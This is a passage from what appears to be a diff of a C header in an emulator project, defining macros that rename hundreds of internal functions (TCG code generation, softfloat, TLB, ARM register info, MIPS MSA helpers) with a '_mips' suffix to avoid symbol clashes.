store_reg_mips +#define store_reg_bx store_reg_bx_mips +#define store_reg_from_load store_reg_from_load_mips +#define stq_be_p stq_be_p_mips +#define stq_be_phys stq_be_phys_mips +#define stq_he_p stq_he_p_mips +#define stq_le_p stq_le_p_mips +#define stq_le_phys stq_le_phys_mips +#define stq_phys stq_phys_mips +#define string_input_get_visitor string_input_get_visitor_mips +#define string_input_visitor_cleanup string_input_visitor_cleanup_mips +#define string_input_visitor_new string_input_visitor_new_mips +#define strongarm_cp_reginfo strongarm_cp_reginfo_mips +#define strstart strstart_mips +#define strtosz strtosz_mips +#define strtosz_suffix strtosz_suffix_mips +#define stw_be_p stw_be_p_mips +#define stw_be_phys stw_be_phys_mips +#define stw_he_p stw_he_p_mips +#define stw_le_p stw_le_p_mips +#define stw_le_phys stw_le_phys_mips +#define stw_phys stw_phys_mips +#define stw_phys_internal stw_phys_internal_mips +#define sub128 sub128_mips +#define sub16_sat sub16_sat_mips +#define sub16_usat sub16_usat_mips +#define sub192 sub192_mips +#define sub8_sat sub8_sat_mips +#define sub8_usat sub8_usat_mips +#define subFloat128Sigs subFloat128Sigs_mips +#define subFloat32Sigs subFloat32Sigs_mips +#define subFloat64Sigs subFloat64Sigs_mips +#define subFloatx80Sigs subFloatx80Sigs_mips +#define subpage_accepts subpage_accepts_mips +#define subpage_init subpage_init_mips +#define subpage_ops subpage_ops_mips +#define subpage_read subpage_read_mips +#define subpage_register subpage_register_mips +#define subpage_write subpage_write_mips +#define suffix_mul suffix_mul_mips +#define swap_commutative swap_commutative_mips +#define swap_commutative2 swap_commutative2_mips +#define switch_mode switch_mode_mips +#define switch_v7m_sp switch_v7m_sp_mips +#define syn_aa32_bkpt syn_aa32_bkpt_mips +#define syn_aa32_hvc syn_aa32_hvc_mips +#define syn_aa32_smc syn_aa32_smc_mips +#define syn_aa32_svc syn_aa32_svc_mips +#define syn_breakpoint syn_breakpoint_mips +#define sync_globals sync_globals_mips +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_mips +#define syn_cp14_rt_trap syn_cp14_rt_trap_mips +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_mips +#define syn_cp15_rt_trap syn_cp15_rt_trap_mips +#define syn_data_abort syn_data_abort_mips +#define syn_fp_access_trap syn_fp_access_trap_mips +#define syn_insn_abort syn_insn_abort_mips +#define syn_swstep syn_swstep_mips +#define syn_uncategorized syn_uncategorized_mips +#define syn_watchpoint syn_watchpoint_mips +#define syscall_err syscall_err_mips +#define system_bus_class_init system_bus_class_init_mips +#define system_bus_info system_bus_info_mips +#define t2ee_cp_reginfo t2ee_cp_reginfo_mips +#define table_logic_cc table_logic_cc_mips +#define target_parse_constraint target_parse_constraint_mips +#define target_words_bigendian target_words_bigendian_mips +#define tb_add_jump tb_add_jump_mips +#define tb_alloc tb_alloc_mips +#define tb_alloc_page tb_alloc_page_mips +#define tb_check_watchpoint tb_check_watchpoint_mips +#define tb_find_fast tb_find_fast_mips +#define tb_find_pc tb_find_pc_mips +#define tb_find_slow tb_find_slow_mips +#define tb_flush tb_flush_mips +#define tb_flush_jmp_cache tb_flush_jmp_cache_mips +#define tb_free tb_free_mips +#define tb_gen_code tb_gen_code_mips +#define tb_hash_remove tb_hash_remove_mips +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_mips +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mips +#define tb_invalidate_phys_range tb_invalidate_phys_range_mips +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_mips +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_mips +#define tb_jmp_remove tb_jmp_remove_mips +#define tb_link_page tb_link_page_mips +#define tb_page_remove tb_page_remove_mips +#define tb_phys_hash_func tb_phys_hash_func_mips +#define tb_phys_invalidate tb_phys_invalidate_mips +#define tb_reset_jump tb_reset_jump_mips +#define tb_set_jmp_target tb_set_jmp_target_mips +#define tcg_accel_class_init tcg_accel_class_init_mips +#define tcg_accel_type tcg_accel_type_mips +#define tcg_add_param_i32 tcg_add_param_i32_mips +#define tcg_add_param_i64 tcg_add_param_i64_mips +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_mips +#define tcg_allowed tcg_allowed_mips +#define tcg_canonicalize_memop tcg_canonicalize_memop_mips +#define tcg_commit tcg_commit_mips +#define tcg_cond_to_jcc tcg_cond_to_jcc_mips +#define tcg_constant_folding tcg_constant_folding_mips +#define tcg_const_i32 tcg_const_i32_mips +#define tcg_const_i64 tcg_const_i64_mips +#define tcg_const_local_i32 tcg_const_local_i32_mips +#define tcg_const_local_i64 tcg_const_local_i64_mips +#define tcg_context_init tcg_context_init_mips +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_mips +#define tcg_cpu_exec tcg_cpu_exec_mips +#define tcg_current_code_size tcg_current_code_size_mips +#define tcg_dump_info tcg_dump_info_mips +#define tcg_dump_ops tcg_dump_ops_mips +#define tcg_exec_all tcg_exec_all_mips +#define tcg_find_helper tcg_find_helper_mips +#define tcg_func_start tcg_func_start_mips +#define tcg_gen_abs_i32 tcg_gen_abs_i32_mips +#define tcg_gen_add2_i32 tcg_gen_add2_i32_mips +#define tcg_gen_add_i32 tcg_gen_add_i32_mips +#define tcg_gen_add_i64 tcg_gen_add_i64_mips +#define tcg_gen_addi_i32 tcg_gen_addi_i32_mips +#define tcg_gen_addi_i64 tcg_gen_addi_i64_mips +#define tcg_gen_andc_i32 tcg_gen_andc_i32_mips +#define tcg_gen_and_i32 tcg_gen_and_i32_mips +#define tcg_gen_and_i64 tcg_gen_and_i64_mips +#define tcg_gen_andi_i32 tcg_gen_andi_i32_mips +#define tcg_gen_andi_i64 tcg_gen_andi_i64_mips +#define tcg_gen_br tcg_gen_br_mips +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mips +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mips +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mips +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mips +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mips +#define tcg_gen_callN tcg_gen_callN_mips +#define tcg_gen_code tcg_gen_code_mips +#define tcg_gen_code_common tcg_gen_code_common_mips +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_mips +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mips +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_mips +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mips +#define tcg_gen_exit_tb tcg_gen_exit_tb_mips +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mips +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mips +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mips +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mips +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mips +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mips +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mips +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mips +#define tcg_gen_goto_tb tcg_gen_goto_tb_mips +#define tcg_gen_ld_i32 tcg_gen_ld_i32_mips +#define tcg_gen_ld_i64 tcg_gen_ld_i64_mips +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_mips +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_mips +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mips +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mips +#define tcg_gen_mov_i32 tcg_gen_mov_i32_mips +#define tcg_gen_mov_i64 tcg_gen_mov_i64_mips +#define tcg_gen_movi_i32 tcg_gen_movi_i32_mips +#define tcg_gen_movi_i64 tcg_gen_movi_i64_mips +#define tcg_gen_mul_i32 tcg_gen_mul_i32_mips +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mips +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mips +#define tcg_gen_neg_i32 tcg_gen_neg_i32_mips +#define tcg_gen_neg_i64 tcg_gen_neg_i64_mips +#define tcg_gen_not_i32 tcg_gen_not_i32_mips +#define tcg_gen_op0 tcg_gen_op0_mips +#define tcg_gen_op1i tcg_gen_op1i_mips +#define tcg_gen_op2_i32 tcg_gen_op2_i32_mips +#define tcg_gen_op2_i64 tcg_gen_op2_i64_mips +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_mips +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_mips +#define tcg_gen_op3_i32 tcg_gen_op3_i32_mips +#define tcg_gen_op3_i64 tcg_gen_op3_i64_mips +#define tcg_gen_op4_i32 tcg_gen_op4_i32_mips +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_mips +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_mips +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_mips +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_mips +#define tcg_gen_op6_i32 tcg_gen_op6_i32_mips +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_mips +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_mips +#define tcg_gen_orc_i32 tcg_gen_orc_i32_mips +#define tcg_gen_or_i32 tcg_gen_or_i32_mips +#define tcg_gen_or_i64 tcg_gen_or_i64_mips +#define tcg_gen_ori_i32 tcg_gen_ori_i32_mips +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mips +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mips +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mips +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mips +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mips +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mips +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mips +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mips +#define tcg_gen_sar_i32 tcg_gen_sar_i32_mips +#define tcg_gen_sari_i32 tcg_gen_sari_i32_mips +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mips +#define tcg_gen_shl_i32 tcg_gen_shl_i32_mips +#define tcg_gen_shl_i64 tcg_gen_shl_i64_mips +#define tcg_gen_shli_i32 tcg_gen_shli_i32_mips +#define tcg_gen_shli_i64 tcg_gen_shli_i64_mips +#define tcg_gen_shr_i32 tcg_gen_shr_i32_mips +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_mips +#define tcg_gen_shr_i64 tcg_gen_shr_i64_mips +#define tcg_gen_shri_i32 tcg_gen_shri_i32_mips +#define tcg_gen_shri_i64 tcg_gen_shri_i64_mips +#define tcg_gen_st_i32 tcg_gen_st_i32_mips +#define tcg_gen_st_i64 tcg_gen_st_i64_mips +#define tcg_gen_sub_i32 tcg_gen_sub_i32_mips +#define tcg_gen_sub_i64 tcg_gen_sub_i64_mips +#define tcg_gen_subi_i32 tcg_gen_subi_i32_mips +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_mips +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_mips +#define tcg_gen_xor_i32 tcg_gen_xor_i32_mips +#define tcg_gen_xor_i64 tcg_gen_xor_i64_mips +#define tcg_gen_xori_i32 tcg_gen_xori_i32_mips +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_mips +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_mips +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_mips +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_mips +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_mips +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_mips +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_mips +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_mips +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_mips +#define tcg_handle_interrupt tcg_handle_interrupt_mips +#define tcg_init tcg_init_mips +#define tcg_invert_cond tcg_invert_cond_mips +#define tcg_la_bb_end tcg_la_bb_end_mips +#define tcg_la_br_end tcg_la_br_end_mips +#define tcg_la_func_end tcg_la_func_end_mips +#define tcg_liveness_analysis tcg_liveness_analysis_mips +#define tcg_malloc tcg_malloc_mips +#define tcg_malloc_internal tcg_malloc_internal_mips +#define tcg_op_defs_org tcg_op_defs_org_mips +#define tcg_opt_gen_mov tcg_opt_gen_mov_mips +#define tcg_opt_gen_movi tcg_opt_gen_movi_mips +#define tcg_optimize tcg_optimize_mips +#define tcg_out16 tcg_out16_mips +#define tcg_out32 tcg_out32_mips +#define tcg_out64 tcg_out64_mips +#define tcg_out8 tcg_out8_mips +#define tcg_out_addi tcg_out_addi_mips +#define tcg_out_branch tcg_out_branch_mips +#define tcg_out_brcond32 tcg_out_brcond32_mips +#define tcg_out_brcond64 tcg_out_brcond64_mips +#define tcg_out_bswap32 tcg_out_bswap32_mips +#define tcg_out_bswap64 tcg_out_bswap64_mips +#define tcg_out_call tcg_out_call_mips +#define tcg_out_cmp tcg_out_cmp_mips +#define tcg_out_ext16s tcg_out_ext16s_mips +#define tcg_out_ext16u tcg_out_ext16u_mips +#define tcg_out_ext32s tcg_out_ext32s_mips +#define tcg_out_ext32u tcg_out_ext32u_mips +#define tcg_out_ext8s tcg_out_ext8s_mips +#define tcg_out_ext8u tcg_out_ext8u_mips +#define tcg_out_jmp tcg_out_jmp_mips +#define tcg_out_jxx tcg_out_jxx_mips +#define tcg_out_label tcg_out_label_mips +#define tcg_out_ld tcg_out_ld_mips +#define tcg_out_modrm tcg_out_modrm_mips +#define tcg_out_modrm_offset tcg_out_modrm_offset_mips +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_mips +#define tcg_out_mov tcg_out_mov_mips +#define tcg_out_movcond32 tcg_out_movcond32_mips +#define tcg_out_movcond64 tcg_out_movcond64_mips +#define tcg_out_movi tcg_out_movi_mips +#define tcg_out_op tcg_out_op_mips +#define tcg_out_pop tcg_out_pop_mips +#define tcg_out_push tcg_out_push_mips +#define tcg_out_qemu_ld tcg_out_qemu_ld_mips +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_mips +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_mips +#define tcg_out_qemu_st tcg_out_qemu_st_mips +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_mips +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_mips +#define tcg_out_reloc tcg_out_reloc_mips +#define tcg_out_rolw_8 tcg_out_rolw_8_mips +#define tcg_out_setcond32 tcg_out_setcond32_mips +#define tcg_out_setcond64 tcg_out_setcond64_mips +#define tcg_out_shifti tcg_out_shifti_mips +#define tcg_out_st tcg_out_st_mips +#define tcg_out_tb_finalize tcg_out_tb_finalize_mips +#define tcg_out_tb_init tcg_out_tb_init_mips +#define tcg_out_tlb_load tcg_out_tlb_load_mips +#define tcg_out_vex_modrm tcg_out_vex_modrm_mips +#define tcg_patch32 tcg_patch32_mips +#define tcg_patch8 tcg_patch8_mips +#define tcg_pcrel_diff tcg_pcrel_diff_mips +#define tcg_pool_reset tcg_pool_reset_mips +#define tcg_prologue_init tcg_prologue_init_mips +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_mips +#define tcg_reg_alloc tcg_reg_alloc_mips +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_mips +#define tcg_reg_alloc_call tcg_reg_alloc_call_mips +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_mips +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_mips +#define tcg_reg_alloc_op tcg_reg_alloc_op_mips +#define tcg_reg_alloc_start tcg_reg_alloc_start_mips +#define tcg_reg_free tcg_reg_free_mips +#define tcg_reg_sync tcg_reg_sync_mips +#define tcg_set_frame tcg_set_frame_mips +#define tcg_set_nop tcg_set_nop_mips +#define tcg_swap_cond tcg_swap_cond_mips +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_mips +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_mips +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_mips +#define tcg_target_const_match tcg_target_const_match_mips +#define tcg_target_init tcg_target_init_mips +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_mips +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_mips +#define tcg_temp_alloc tcg_temp_alloc_mips +#define tcg_temp_free_i32 tcg_temp_free_i32_mips +#define tcg_temp_free_i64 tcg_temp_free_i64_mips +#define tcg_temp_free_internal tcg_temp_free_internal_mips +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_mips +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_mips +#define tcg_temp_new_i32 tcg_temp_new_i32_mips +#define tcg_temp_new_i64 tcg_temp_new_i64_mips +#define tcg_temp_new_internal tcg_temp_new_internal_mips +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_mips +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_mips +#define tdb_hash tdb_hash_mips +#define teecr_write teecr_write_mips +#define teehbr_access teehbr_access_mips +#define temp_allocate_frame temp_allocate_frame_mips +#define temp_dead temp_dead_mips +#define temps_are_copies temps_are_copies_mips +#define temp_save temp_save_mips +#define temp_sync temp_sync_mips +#define tgen_arithi tgen_arithi_mips +#define tgen_arithr tgen_arithr_mips +#define thumb2_logic_op thumb2_logic_op_mips +#define ti925t_initfn ti925t_initfn_mips +#define tlb_add_large_page tlb_add_large_page_mips +#define tlb_flush_entry tlb_flush_entry_mips +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_mips +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_mips +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_mips +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_mips +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_mips +#define tlbi_aa64_va_write tlbi_aa64_va_write_mips +#define tlbiall_is_write tlbiall_is_write_mips +#define tlbiall_write tlbiall_write_mips +#define tlbiasid_is_write tlbiasid_is_write_mips +#define tlbiasid_write tlbiasid_write_mips +#define tlbimvaa_is_write tlbimvaa_is_write_mips +#define tlbimvaa_write tlbimvaa_write_mips +#define tlbimva_is_write tlbimva_is_write_mips +#define tlbimva_write tlbimva_write_mips +#define tlb_is_dirty_ram tlb_is_dirty_ram_mips +#define tlb_protect_code tlb_protect_code_mips +#define tlb_reset_dirty_range tlb_reset_dirty_range_mips +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_mips +#define tlb_set_dirty tlb_set_dirty_mips +#define tlb_set_dirty1 tlb_set_dirty1_mips +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_mips +#define tlb_vaddr_to_host tlb_vaddr_to_host_mips +#define token_get_type token_get_type_mips +#define token_get_value token_get_value_mips +#define token_is_escape token_is_escape_mips +#define token_is_keyword token_is_keyword_mips +#define token_is_operator token_is_operator_mips +#define tokens_append_from_iter tokens_append_from_iter_mips +#define to_qiv to_qiv_mips +#define to_qov to_qov_mips +#define tosa_init tosa_init_mips +#define tosa_machine_init tosa_machine_init_mips +#define tswap32 tswap32_mips +#define tswap64 tswap64_mips +#define type_class_get_size type_class_get_size_mips +#define type_get_by_name type_get_by_name_mips +#define type_get_parent type_get_parent_mips +#define type_has_parent type_has_parent_mips +#define type_initialize type_initialize_mips +#define type_initialize_interface type_initialize_interface_mips +#define type_is_ancestor type_is_ancestor_mips +#define type_new type_new_mips +#define type_object_get_size type_object_get_size_mips +#define type_register_internal type_register_internal_mips +#define type_table_add type_table_add_mips +#define type_table_get type_table_get_mips +#define type_table_lookup type_table_lookup_mips +#define uint16_to_float32 uint16_to_float32_mips +#define uint16_to_float64 uint16_to_float64_mips +#define uint32_to_float32 uint32_to_float32_mips +#define uint32_to_float64 uint32_to_float64_mips +#define uint64_to_float128 uint64_to_float128_mips +#define uint64_to_float32 uint64_to_float32_mips +#define uint64_to_float64 uint64_to_float64_mips +#define unassigned_io_ops unassigned_io_ops_mips +#define unassigned_io_read unassigned_io_read_mips +#define unassigned_io_write unassigned_io_write_mips +#define unassigned_mem_accepts unassigned_mem_accepts_mips +#define unassigned_mem_ops unassigned_mem_ops_mips +#define unassigned_mem_read unassigned_mem_read_mips +#define unassigned_mem_write unassigned_mem_write_mips +#define update_spsel update_spsel_mips +#define v6_cp_reginfo v6_cp_reginfo_mips +#define v6k_cp_reginfo v6k_cp_reginfo_mips +#define v7_cp_reginfo v7_cp_reginfo_mips +#define v7mp_cp_reginfo v7mp_cp_reginfo_mips +#define v7m_pop v7m_pop_mips +#define v7m_push v7m_push_mips +#define v8_cp_reginfo v8_cp_reginfo_mips +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_mips +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_mips +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_mips +#define vapa_cp_reginfo vapa_cp_reginfo_mips +#define vbar_write vbar_write_mips +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_mips +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_mips +#define vfp_get_fpcr vfp_get_fpcr_mips +#define vfp_get_fpscr vfp_get_fpscr_mips +#define vfp_get_fpsr vfp_get_fpsr_mips +#define vfp_reg_offset vfp_reg_offset_mips +#define vfp_set_fpcr vfp_set_fpcr_mips +#define vfp_set_fpscr vfp_set_fpscr_mips +#define vfp_set_fpsr vfp_set_fpsr_mips +#define visit_end_implicit_struct visit_end_implicit_struct_mips +#define visit_end_list visit_end_list_mips +#define visit_end_struct visit_end_struct_mips +#define visit_end_union visit_end_union_mips +#define visit_get_next_type visit_get_next_type_mips +#define visit_next_list visit_next_list_mips +#define visit_optional visit_optional_mips +#define visit_start_implicit_struct visit_start_implicit_struct_mips +#define visit_start_list visit_start_list_mips +#define visit_start_struct visit_start_struct_mips +#define visit_start_union visit_start_union_mips +#define vmsa_cp_reginfo vmsa_cp_reginfo_mips +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_mips +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_mips +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_mips +#define vmsa_ttbcr_write vmsa_ttbcr_write_mips +#define vmsa_ttbr_write vmsa_ttbr_write_mips +#define write_cpustate_to_list write_cpustate_to_list_mips +#define write_list_to_cpustate write_list_to_cpustate_mips +#define write_raw_cp_reg write_raw_cp_reg_mips +#define X86CPURegister32_lookup X86CPURegister32_lookup_mips +#define x86_op_defs x86_op_defs_mips +#define xpsr_read xpsr_read_mips +#define xpsr_write xpsr_write_mips +#define xscale_cpar_write xscale_cpar_write_mips +#define xscale_cp_reginfo xscale_cp_reginfo_mips +#define cpu_mips_exec cpu_mips_exec_mips +#define cpu_mips_get_random cpu_mips_get_random_mips +#define cpu_mips_get_count cpu_mips_get_count_mips +#define cpu_mips_store_count cpu_mips_store_count_mips +#define cpu_mips_store_compare cpu_mips_store_compare_mips +#define cpu_mips_start_count cpu_mips_start_count_mips +#define cpu_mips_stop_count cpu_mips_stop_count_mips +#define mips_machine_init mips_machine_init_mips +#define cpu_mips_kseg0_to_phys cpu_mips_kseg0_to_phys_mips +#define cpu_mips_phys_to_kseg0 cpu_mips_phys_to_kseg0_mips +#define cpu_mips_kvm_um_phys_to_kseg0 cpu_mips_kvm_um_phys_to_kseg0_mips +#define mips_cpu_register_types mips_cpu_register_types_mips +#define cpu_mips_init cpu_mips_init_mips +#define cpu_state_reset cpu_state_reset_mips +#define helper_msa_andi_b helper_msa_andi_b_mips +#define helper_msa_ori_b helper_msa_ori_b_mips +#define helper_msa_nori_b helper_msa_nori_b_mips +#define helper_msa_xori_b helper_msa_xori_b_mips +#define helper_msa_bmnzi_b helper_msa_bmnzi_b_mips +#define helper_msa_bmzi_b helper_msa_bmzi_b_mips +#define helper_msa_bseli_b helper_msa_bseli_b_mips +#define helper_msa_shf_df helper_msa_shf_df_mips +#define helper_msa_and_v helper_msa_and_v_mips +#define helper_msa_or_v helper_msa_or_v_mips +#define helper_msa_nor_v helper_msa_nor_v_mips +#define helper_msa_xor_v helper_msa_xor_v_mips +#define helper_msa_bmnz_v helper_msa_bmnz_v_mips +#define helper_msa_bmz_v helper_msa_bmz_v_mips +#define helper_msa_bsel_v helper_msa_bsel_v_mips +#define helper_msa_addvi_df helper_msa_addvi_df_mips +#define helper_msa_subvi_df helper_msa_subvi_df_mips +#define helper_msa_ceqi_df helper_msa_ceqi_df_mips +#define helper_msa_clei_s_df helper_msa_clei_s_df_mips +#define helper_msa_clei_u_df helper_msa_clei_u_df_mips +#define helper_msa_clti_s_df helper_msa_clti_s_df_mips +#define helper_msa_clti_u_df helper_msa_clti_u_df_mips +#define helper_msa_maxi_s_df helper_msa_maxi_s_df_mips +#define helper_msa_maxi_u_df helper_msa_maxi_u_df_mips +#define helper_msa_mini_s_df helper_msa_mini_s_df_mips +#define helper_msa_mini_u_df helper_msa_mini_u_df_mips +#define helper_msa_ldi_df helper_msa_ldi_df_mips +#define helper_msa_slli_df helper_msa_slli_df_mips +#define helper_msa_srai_df helper_msa_srai_df_mips +#define helper_msa_srli_df helper_msa_srli_df_mips +#define helper_msa_bclri_df helper_msa_bclri_df_mips +#define helper_msa_bseti_df helper_msa_bseti_df_mips +#define helper_msa_bnegi_df helper_msa_bnegi_df_mips +#define helper_msa_sat_s_df helper_msa_sat_s_df_mips +#define helper_msa_sat_u_df helper_msa_sat_u_df_mips +#define helper_msa_srari_df helper_msa_srari_df_mips +#define helper_msa_srlri_df helper_msa_srlri_df_mips +#define helper_msa_binsli_df helper_msa_binsli_df_mips +#define helper_msa_binsri_df helper_msa_binsri_df_mips +#define helper_msa_sll_df helper_msa_sll_df_mips +#define helper_msa_sra_df helper_msa_sra_df_mips +#define helper_msa_srl_df helper_msa_srl_df_mips +#define helper_msa_bclr_df helper_msa_bclr_df_mips +#define helper_msa_bset_df helper_msa_bset_df_mips +#define helper_msa_bneg_df helper_msa_bneg_df_mips +#define helper_msa_addv_df helper_msa_addv_df_mips +#define helper_msa_subv_df helper_msa_subv_df_mips +#define helper_msa_max_s_df helper_msa_max_s_df_mips +#define helper_msa_max_u_df helper_msa_max_u_df_mips +#define helper_msa_min_s_df helper_msa_min_s_df_mips +#define helper_msa_min_u_df helper_msa_min_u_df_mips +#define helper_msa_max_a_df helper_msa_max_a_df_mips +#define helper_msa_min_a_df helper_msa_min_a_df_mips +#define helper_msa_ceq_df helper_msa_ceq_df_mips +#define helper_msa_clt_s_df helper_msa_clt_s_df_mips +#define helper_msa_clt_u_df helper_msa_clt_u_df_mips +#define helper_msa_cle_s_df helper_msa_cle_s_df_mips +#define helper_msa_cle_u_df helper_msa_cle_u_df_mips +#define helper_msa_add_a_df helper_msa_add_a_df_mips +#define helper_msa_adds_a_df helper_msa_adds_a_df_mips +#define helper_msa_adds_s_df helper_msa_adds_s_df_mips +#define helper_msa_adds_u_df helper_msa_adds_u_df_mips +#define helper_msa_ave_s_df helper_msa_ave_s_df_mips +#define helper_msa_ave_u_df helper_msa_ave_u_df_mips +#define helper_msa_aver_s_df helper_msa_aver_s_df_mips +#define helper_msa_aver_u_df helper_msa_aver_u_df_mips +#define helper_msa_subs_s_df helper_msa_subs_s_df_mips +#define helper_msa_subs_u_df helper_msa_subs_u_df_mips +#define helper_msa_subsus_u_df helper_msa_subsus_u_df_mips +#define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mips +#define helper_msa_asub_s_df helper_msa_asub_s_df_mips +#define helper_msa_asub_u_df helper_msa_asub_u_df_mips +#define helper_msa_mulv_df helper_msa_mulv_df_mips +#define helper_msa_div_s_df helper_msa_div_s_df_mips +#define helper_msa_div_u_df helper_msa_div_u_df_mips +#define helper_msa_mod_s_df helper_msa_mod_s_df_mips +#define helper_msa_mod_u_df helper_msa_mod_u_df_mips +#define helper_msa_dotp_s_df helper_msa_dotp_s_df_mips +#define helper_msa_dotp_u_df helper_msa_dotp_u_df_mips +#define helper_msa_srar_df helper_msa_srar_df_mips +#define helper_msa_srlr_df helper_msa_srlr_df_mips +#define helper_msa_hadd_s_df helper_msa_hadd_s_df_mips +#define helper_msa_hadd_u_df helper_msa_hadd_u_df_mips +#define helper_msa_hsub_s_df helper_msa_hsub_s_df_mips +#define helper_msa_hsub_u_df helper_msa_hsub_u_df_mips +#define helper_msa_mul_q_df helper_msa_mul_q_df_mips +#define helper_msa_mulr_q_df helper_msa_mulr_q_df_mips +#define helper_msa_sld_df helper_msa_sld_df_mips +#define helper_msa_maddv_df helper_msa_maddv_df_mips +#define helper_msa_msubv_df helper_msa_msubv_df_mips +#define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mips +#define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mips +#define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mips +#define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mips +#define helper_msa_binsl_df helper_msa_binsl_df_mips +#define helper_msa_binsr_df helper_msa_binsr_df_mips +#define helper_msa_madd_q_df helper_msa_madd_q_df_mips +#define helper_msa_msub_q_df helper_msa_msub_q_df_mips +#define helper_msa_maddr_q_df helper_msa_maddr_q_df_mips +#define helper_msa_msubr_q_df helper_msa_msubr_q_df_mips +#define helper_msa_splat_df helper_msa_splat_df_mips +#define helper_msa_pckev_df helper_msa_pckev_df_mips +#define helper_msa_pckod_df helper_msa_pckod_df_mips +#define helper_msa_ilvl_df helper_msa_ilvl_df_mips +#define helper_msa_ilvr_df helper_msa_ilvr_df_mips +#define helper_msa_ilvev_df helper_msa_ilvev_df_mips +#define helper_msa_ilvod_df 